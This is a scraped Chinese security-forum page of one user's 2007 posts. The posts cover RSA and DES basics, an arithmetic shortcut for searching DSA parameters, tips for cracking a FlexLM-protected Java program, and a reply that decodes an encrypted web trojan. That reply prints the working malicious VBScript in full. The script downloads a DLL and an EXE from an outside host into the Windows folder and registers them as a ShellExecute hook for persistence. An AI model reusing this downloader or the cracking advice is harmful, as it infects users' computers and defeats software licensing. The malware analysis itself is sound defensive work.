|
[原创]J2ME游戏 极品香车美女 授权分析
哪有什么时间去注意错别字呀,重要的是内容,不过有错字可能让大家产生了异议,再次致歉 |
|
[求助]RSA加密的结果是不是一定要保存为16进制
好像不一定吧,关键看你怎么用加密的数据了。 如果保存之后还要显示 那么就得用BASE64了。 如果用于数据传输还是要用到数据的。 同时,所谓的16进制。如果是加密后在内存中,那么不用管它是什么,最终都是二进制。 如果使用RSA生成器,那么使用16进制会使结果的字符串少一点。 Date:2007/05/9 |
|
[求助]关于java的反汇编
VJ++将生成的类文件,添加到exe文件的资源中。同时使用Unicode格式将所有的源代码保存到 exe的资源中,也就是使用ResHacker将exe文件打开,整个想要的东西就都出来了。 很久以前就抛弃VJ++了 DJ Java可以处理.jar/.class文件,好像打包成.exe文件还处理不了。 |
|
|
|
找小牛们帮忙~大牛太忙,肯定不管"DES算法把64位的明文"是什么问题?何来64位明文
S盒 与 P盒 的排列 以及原理可以在书中找到 , 你可以那么理解。学过数字电路的话,可以对 理解 S盒 P盒 有帮助。 别忘了,在进行转换之前还有一个初始化变换。 init 和 init-1 呢。 书上 或者 网上都有 我这些都忘了 |
|
找小牛们帮忙~大牛太忙,肯定不管"DES算法把64位的明文"是什么问题?何来64位明文
DES使用分组加密(也叫块加密),就是说 你又一个数据 比如包含了许多字节。 每个字节 8位 可以想象成一个序列 0123456789012345678901234567890 那么第一个64位的数据块就是 01234567 第二个 89012345 第三个 67890123 分成 64位的数据 也就是 8个字节 经过 S盒与P盒进行置换、混乱、同时使用 Key 进行加密 就生成 了加密的数据了。 由于DES算法公开,所以 必须保留好加密的密钥。 Author: vhly[FR] Date: 2007/04/25 |
|
[原创]简单的研究DSA算法 12楼进行更新 提供乘法、幂运算的特征应用
最新的关于DSA参数的简单分析 如果最开始的方法被称为特征方法1的话,那么下面的可以被称为特征方法2了吧。 特征方法2: 根据尾数乘法的特性来进行计算。 根据,比如S = 2 X N 中的N取值为1~10,那么 S的尾数值应该为下面的数值 N尾数:1 2 3 4 5 6 7 8 9 0 S尾数:2 4 6 8 0 2 4 6 8 0 那么不论N为何值,S的值得尾数永远在上面表中。 如果假设 S = Q X N 已知Q、已知S的尾数,那么可以推断出N的尾数情况。 这样就可以在循环中去除那些根本不可能的数值。 情况一: 假设DSA参数 P=113 G=16 Y=30 (X=2) 公式: M=N*P+Y 要求M%G=0,那么M值的尾数应该在如下范围: 6 2 8 4 0 由于G是偶数,所以范围为5个数,奇数为10个数字 已知Y的尾数为0,那么N*P的尾数范围应该在: 6 2 8 4 0 又因为P的尾数已知为3,那么N的尾数范围应该为 2 4 6 8 0 由于所有数字只使用了1位,那么先进行1为测试: N = 2 M=N*P+Y=> 256 256%16=0 当找到为2时 表达式M=N*P+Y M%G=0 那么使用G为周期 N = 18 M=N*P+Y=>2064 M%G=0 情况二: 假设DSA参数 P=113 G=16 Y=109 (X=4) 公式: M=N*P+Y 要求M%G=0,那么M值的尾数应该在如下范围: 6 2 8 4 0 由于G是偶数,所以范围为5个数,奇数为10个数字 已知Y的尾数为9,那么N*P的尾数范围应该在: 7 3 9 5 1 又因为P的尾数已知为3,那么N的尾数范围应该为 9 1 3 5 7 由于所有数字只使用了1位,那么先进行1为测试: N=9 M=1126 M%G!=0 N=3 M=448 M%G=0 那么N最小取值为3,之后以G为周期遍历,找出M=G^X 最终可以找到。 特征方法3: 关于幂的尾数取值 任意一个数的任意次幂的尾数,都可以推算,尾数以4为周期固定变换 比如求13^1997的尾数 底数为13 底数的尾数W(13)=3 W()为求尾数 指数 1997 1997%4=1 W(3^1)=3 W(3^2)=9 W(3^3)=7 W(3^4)=1 因此13^1997的尾数为3 可求出式子 S=A^B D1 = W(A) D2 = B%4 W(S)=W(W(D1^4) * W(A^D2)) 待到DSA参数中,可以加快(筛选)公式M=N*P+Y中N的可能取值 幂底数表 指数 底数 1 2 3 4 1 1 1 1 1 2 2 4 8 6 3 3 9 7 1 4 4 6 4 6 5 5 5 5 5 6 6 6 6 6 7 7 9 3 1 8 8 4 2 6 9 9 1 9 1 如果底数尾数为6 那么指数任意尾数不变 5 gen at 2007/03/03 by vhly[FR] |
|
Any idea on how to crack Flexlm protected Java program.
You would use the Java class file decompiler to understand what/how the class work,and you would use the debugger for example the ODB to debug and logging the class work flow. decompiler: DJ Java, Decafe, etc Debugger: SWAT, JDebugTool, ODB Have a good day! |
|
[原创]简单的研究DSA算法 12楼进行更新 提供乘法、幂运算的特征应用
没想到这篇文章刚刚发布了1个小时就被设成精华了,太感谢了。 其实分析上述方法经历了至少3、4个晚上,通过针对DSA中 G的生成,进行了大量的实例演算,同时分析了G分别为奇数以及偶数时A的取值范围,经过各种判断,最终确立了 M = (A*G+N1)*P+Y的算法来生成数据 其实最初的算法我摄制成 M = N*P + Y 如果要求M%G=0,则N要便利大量的数值。因此又继续分析求模运算的周期,以及初始数值的关系, 才将 M = (A * G + N1) * P +Y 推算出来。 在此感谢大家的关注 当然,还有求 G^X = M 式子中的 X 也就是密钥呢,这才是关键,也将是 花费运算最多的地方 vhly[FR] GEN this topic at 2007/02/13 |
|
|
|
[求助]针对 Nokia Developer's Suilt 关于DSA 的分析
不知道是不是P的位数长度过长了,我使用 Java中的KeyPairGenerator生成DSA公钥和私钥,同时使用 DLPTool但是还是提示 P is not prime 请大家帮助 |
|
碰到加密的网马!![求助]
On Error Resume Next ' 通过网页文档对象创建对象 Set obj = document.createElement(object) '设置<object>标签属性 obj.setAttribute classid, clsid:BD96C556-65A3-11D0-983A-00C04FC29E36 '创建 Microsoft.XMLHTTP 可以用来下载文件 set objXML=obj.CreateObject(Microsoft.XMLHTTP,"") '病毒文件 urlPathName=http://css.scriptt.in/update.dll objXML.Open GET,urlPathName,False objXML.Send set objTT=obj.CreateObject(Microsoft.XMLHTTP,"") urlPathName=http://css.scriptt.in/update.exe objTT.Open GET,urlPathName,False objTT.Send..set objFSO=obj.CreateObject(Scripting.FileSystemObject,"") set shell=objFSO.GetSpecialFolder(0) shellName= objFSO.BuildPath(shell,WinHttp.dll) RunName=objFSO.BuildPath(shell,KB726255.log) set objStream=obj.CreateObject(Adodb.Stream,"") With objStream .Type=1 .Open .Write objXML.responseBody .SaveToFile shellName,2 .Close End With With objStream .Type=1 .Open .Write objTT.responseBody .SaveToFile RunName,2 .Close End With '一下围修改注册表 Set objRegistry = obj.CreateObject(WScript.Shell,"") keyName=HKLM\SOFTWARE\Classes\CLSID\{36CD708B-6077-4C02-9377-D73EAA495A0F}\ objRegistry.RegWrite keyName,HTTP Execute Hooks keyName=keyName & InprocServer32\ keyNameEx=HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks\{36CD708B-6077-4C02-9377-D73EAA495A0F} objRegistry.RegWrite keyName,shellName objRegistry.RegWrite keyName & ThreadingModel,Apartment objRegistry.RegWrite keyNameEx,"" |
|
|
操作理由
RANk
{{ user_info.golds == '' ? 0 : user_info.golds }}
雪币
{{ experience }}
课程经验
{{ score }}
学习收益
{{study_duration_fmt}}
学习时长
基本信息
荣誉称号:
{{ honorary_title }}
能力排名:
No.{{ rank_num }}
等 级:
LV{{ rank_lv-100 }}
活跃值:
在线值:
浏览人数:{{ visits }}
最近活跃:{{ last_active_time }}
注册时间:{{ user_info.create_date_jsonfmt }}
勋章
兑换勋章
证书
证书查询 >
能力值